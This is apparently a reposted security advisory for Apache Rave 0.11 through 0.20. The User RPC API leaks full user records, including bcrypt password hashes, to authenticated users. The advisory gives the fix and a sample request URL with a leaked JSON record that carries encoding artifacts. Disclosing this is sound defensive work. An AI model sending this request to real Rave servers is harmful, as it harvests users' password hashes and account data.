开发者: The Apache Software Foundation 影响版本:Rave 0.11 to 0.20 描述 Rave returns the full user object, including the salted and hashed password, via the User RPC API. This endpoint is only available to authenticated users, but will return all User objects in the database given the correct query. 解决方案: All users who rely on Rave's user management capabilities should upgrade to 0.20.1 or later. If an upgrade is infeasible, restrict access to the /app/api/user URL paths via Spring Security configuration or other means. 示例 A request to: www.2cto.com /app/api/rpc/users/get?offset=3DOFFSET will return the following: {"error":false,"errorMessage":null,"errorCode":"NO_ERROR","result":{"result= Set":[{"entityId":1,"username":"canonical","email":"canonical@example.com",= "displayName":"Canonical User","additionalName":"canonical","familyName":"User","givenName":"Canonic= al","honorificPrefix":null,"honorificSuffix":null,"preferredName":null,"abo= utMe":null,"status":"Single","addresses":[],"organizations":[],"properties"= :[{"entityId":1,"type":"thumbnailUrl","value":"http://opensocial2.org:8080/= collabapp/images/avatars/BillRanney.jpg","qualifier":null,"extendedValue":n= ull,"primary":null,"id":"1"}],"password":"$2a$10$TkEgze5kLy9nRlfd8PT1zunh6P= 1ND8 WP jLojFjAMNgZMu1D9D1n4.","expired":false,"locked":false,"enabled":true,= "openId":null,"forgotPasswordHash":null,"forgotPasswordTime":null,"defaultP= ageLayout":{"entityId":4,"code":"columns_3","numberOfRegions":3,"renderSequ= ence":3,"userSelectable":true},"confirmPassword":null,"defaultPageLayoutCod= e":null,"authorities":[{"entityId":2,"authority":"ROLE_ADMIN","users":[],"d= efaultForNewUser":false}],"id":"1","accountNonLocked":true,"credentialsNonE= xpired":true,"accountNonExpired":true}, ........ ],"pageSize":10,"offset":0,"totalResults":14,"numberOfPages":2,"cu= rrentPage":1}}
查看更多关于Apache Rave 0.11 - 0.20 用户信息泄露 - 网站安全 - 自的详细内容...